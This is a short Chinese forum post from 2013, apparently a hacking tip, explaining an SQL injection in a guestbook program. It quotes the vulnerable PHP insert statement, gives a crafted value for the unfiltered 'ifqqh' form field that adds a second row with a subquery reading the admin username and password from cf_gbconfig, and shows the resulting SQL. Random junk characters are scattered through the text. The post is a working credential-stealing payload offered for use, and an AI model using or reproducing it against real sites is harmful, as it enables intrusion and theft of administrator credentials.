留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
" q+ X& E- {+ y4 O$ F3 }
& ~6 c3 `. Y: p: ^; r$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
1 ]% a! f* e, f7 K+ D$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响: h+ I" T+ i2 C( y @' _7 O
1 t0 q2 n/ X5 }& V; Z7 N `
提交的时候把ifqqh的值改一下。变成
3 E$ W3 X/ b, V, ]5 U% }3 w
& V. h' c' h5 c( h, t( {<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />) l" G9 Q4 J/ r$ a+ a+ t, z N
8 A4 {& x- G( E4 w, ]& h* _
这样SQL插入语句就变了.
0 j2 s/ K" e3 p6 E" S* M$ R1 [5 S2 u3 e
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)$ B. e a* Q) U* l
7 V6 U5 |$ u5 _8 R* M
构造了另外一句SQL。并且把帐号密码读出来。
" [7 I6 d D% x% _7 _( F# |1 J+ _9 t3 z0 X6 c" I. W, e/ b* Y) C/ W+ t
|
发表于 2013-2-19 08:10:11
收藏
支持
反对